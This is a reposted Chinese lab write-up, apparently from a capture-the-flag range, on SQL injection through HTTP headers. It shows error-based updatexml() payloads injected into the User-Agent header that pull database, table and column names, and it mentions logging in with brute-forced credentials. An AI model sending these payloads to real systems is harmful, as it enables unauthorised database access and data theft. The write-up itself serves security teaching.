http header注入

        该注入是指利用后端验证客户端信息比如常用cookie验证)或者通过http header获取客户端的一些信息比如useragent用户代理等其他http header字段信息),因为这些信息是会重新返回拼接后台中的,所以再对这些信息进行sql处理,又因为后台没有进过相对应的信息处理所以构成了sql注入

总结就是: 在传参时,后端为了验证或者获取客户端的一些信息,将这些信息存入到数据库没有进行相关处理,所以存在header注入

User-Agent

服务器发送包含访问系统引擎版本浏览器信息的字段信息。一般服务器识别出是爬虫请求,会拒绝访问。所以此时设置User-Agent可以爬虫伪装成用户通过浏览器访问。

X-Forwarded-For一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址.

updatexml (XML_document, XPath_string, new_value); 

第一个参数:XML_document是String格式,为XML文档对象名称

第二个参数:XPath_string (Xpath格式字符串)

第三个参数:new_value,String格式替换查找到的符合条件数据

updatexml() 更新xml文档函数
语法updatexml(目标xml内容xml文档路径更新内容)
构建语句
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

通过爆破我们知道usernamepasswordadmin  123456

insert into登录之后才能执行,也就是靶场登录之后才能执行head注入

然而我们发现 在Useragent后边拼接字符串他的页面报错,所以知道了在UA这里存在注入

我们发现将User-agent改为 1′,’2′) — 1的时候绕过过滤,页面显示正常

and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1),’2′) — 1

查询库名

这里andor需要都试一下

然后获取到表名

‘or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x7e),1),’2′) — 1

‘or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=’flag_headlimit 0,1),0x7e),1),’2′) — 1

数据

然后就出来了

原文地址:https://blog.csdn.net/qq_51802152/article/details/134781108

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_44442.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注